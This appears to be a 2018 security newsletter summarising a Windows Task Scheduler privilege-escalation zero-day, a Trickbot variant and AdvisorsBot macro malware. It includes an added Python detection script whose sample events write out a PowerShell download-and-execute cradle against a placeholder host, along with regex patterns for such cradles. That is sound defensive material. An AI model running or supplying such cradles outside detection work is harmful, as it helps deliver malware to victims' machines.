
Insight Weekly Security News Letter-29-Aug-2018


A New Zero-Day Vulnerability Found on Windows Machines:

A security researcher has publicly disclosed the details of a previously unknown zero-day vulnerability in Microsoft's Windows operating system that could help a local user or malicious program obtain SYSTEM privileges on the targeted machine.

The zero-day flaw has been confirmed working on a “fully-patched 64-bit Windows 10 system.”

How it works:

The vulnerability is a privilege escalation issue that resides in the Windows Task Scheduler and stems from errors in its handling of Advanced Local Procedure Call (ALPC) interfaces.

The revelation of the Windows zero-day came earlier today from a Twitter user with the online alias SandboxEscaper, who also posted a link to a GitHub page hosting a proof-of-concept (PoC) exploit for the privilege escalation vulnerability in Windows.

Impact

According to CERT/CC, the zero-day flaw, if exploited, could allow local users to obtain elevated (SYSTEM) privileges.

The impact of the vulnerability is limited, with a CVSS score of 6.4 to 6.8, but the PoC exploit released by the researcher could potentially help malware authors target Windows users.

Microsoft is likely to patch the vulnerability in its next month’s security Patch Tuesday, which is scheduled for September 11.

Banking Malware With New Variant – Trickbot

While Trickbot has historically targeted the financial industry, it has now expanded its targeting of other industries via its account-checking activities, according to fresh analysis.

Security researchers discovered a new module called spreader_x86.dll that contains two files, SsExecutor_x86.exe and screenLocker_x86.dll, that form part of Trickbot's new arsenal.

The malware extends its evasion capabilities by attempting to add a link to the trojan's startup path, taking over registry user profiles to maintain persistence.

How it Works:

The gang's account-checking operation requires a steady stream of new, 'clean' proxies so that its activity is not automatically blocked by companies' IP-origin anti-fraud systems. Therefore, their existing infections are turned into account-checking proxies.

Impact:

A successful attack can be devastating to both a company’s finances and reputation, especially when it comes to threats that directly affect customers and shareholders.

Remediation:

  • Track any suspicious activity, such as C&C communication and traffic to malicious URLs, by collecting and reviewing network logs.

Reference:

https://www.infosecurity-magazine.com/news/trickbot-evolves-with/

The newly discovered AdvisorsBot malware is being actively distributed by the threat actor TA555 to target hotels, restaurants, and telecommunications organizations using malicious Word documents.

The malware spreads in various forms via email with fake content that tricks victims into opening it, infecting them and stealing sensitive data.

Researchers observed the AdvisorsBot malware spreading in three different forms: the first arrives via email targeting hotels, the second targets restaurants, and the third mimics a résumé, carrying a malicious macro document, to attack telecommunications companies.

All of the targeting emails contain macros, and the attack tricks users into enabling them; the macro then executes a PowerShell command that downloads and executes the AdvisorsBot malware.

The threat actor later shifted technique so that the PowerShell command, once executed, downloads a further PowerShell script.
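The macro-to-PowerShell chain described above leaves a visible trace in process-creation telemetry. As an added example (not from the original article or its sources), the Python below applies a simple detection rule over constructed Sysmon-style events: an Office application spawning PowerShell, or a command line carrying two or more download-cradle traits, is flagged. The event fields, file paths and URL are constructed samples.

```python
import re

# Constructed sample process-creation events in a Sysmon Event ID 1 style;
# not real telemetry. The first mirrors the macro -> PowerShell -> download chain.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://stage2.example.invalid/a.ps1')\""},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -enc SQBFAFgAIABwAGEAeQBsAG8AYQBkAA=="},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users\\Public"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Traits of a PowerShell download-and-execute cradle, each matched separately.
INDICATORS = {
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "execute": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded": re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\b", re.I),
    "stealth": re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I),
}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyze_event(event):
    """Return (suspicious, reasons) for one process-creation event."""
    reasons = []
    parent = basename(event["parent"])
    cmdline = event["cmdline"]
    # Catch both direct spawns and cmd.exe wrappers that hand off to PowerShell.
    invokes_ps = basename(event["image"]) in ("powershell.exe", "pwsh.exe") \
        or "powershell" in cmdline.lower()
    if parent in OFFICE_PARENTS and invokes_ps:
        reasons.append("office_spawned_powershell")
    reasons += [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # Office -> PowerShell is suspicious on its own; elsewhere require two cradle traits.
    suspicious = "office_spawned_powershell" in reasons or len(reasons) >= 2
    return suspicious, reasons

def find_suspicious(events):
    """Return a list of (index, reasons) for events that should be alerted on."""
    hits = []
    for i, event in enumerate(events):
        suspicious, reasons = analyze_event(event)
        if suspicious:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for i, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(reasons)}")
```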

AdvisorsBot Malware Infection Technique

The attackers use large amounts of junk code, such as extra instructions, conditional statements, and loops, to strengthen the malware's anti-analysis techniques and make it difficult to analyze.

Impact:

Finally, the attacker uses a fingerprinting module sent from a C&C server, and its commands perform data-stealing activities such as taking a screenshot, extracting Microsoft Outlook account details, and other malicious actions.

Reference:

https://gbhackers.com/advisorsbot-malware-attack/

